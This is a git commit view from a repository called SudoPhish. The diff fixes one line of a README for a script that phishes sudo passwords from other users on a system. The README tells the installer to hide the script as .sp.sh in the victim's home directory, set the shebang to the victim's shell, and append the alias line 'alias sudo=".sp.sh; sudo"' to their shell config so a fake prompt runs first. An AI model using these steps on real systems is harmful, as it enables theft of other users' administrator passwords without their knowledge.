SudoPhish

Unnamed repository; edit this file 'description' to name the repository.
Log | Files | Refs | README | LICENSE

commit 56f0e7a09c34f54b9712ab48b7dc8283217c2398
parent 59cf35967074c1ff3de7f8c5933447ed24d478a0
Author: MichaelDim02 <31562759+MichaelDim02@users.noreply.github.com>
Date:   Thu,  8 Jul 2021 08:37:22 +0000

Update README.md
Diffstat:
MREADME.md | 2+-
1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/README.md b/README.md @@ -11,5 +11,5 @@ A short self-destructive script to phish the passwords of the users on your syst + Move everything to the home directory of the user if it isn't there already + Make sure you edit the shabang according to the users interactive SH. If they use bash, make sure the script starts with #!/bin/bash , if they use zsh, then make sure it starts with #!/bin/zsh etc. It does not work with fish. Default is bash. + Set the $shellfile variable accordingly (line 21). Default is .bashrc -+ Put the following line at the END of the Shell config file: ``` alias sudo=".sp.sh; sudo" ++ Put the following line at the END of the Shell config file: ``` alias sudo=".sp.sh; sudo" ``` + Rename the file .sp.sh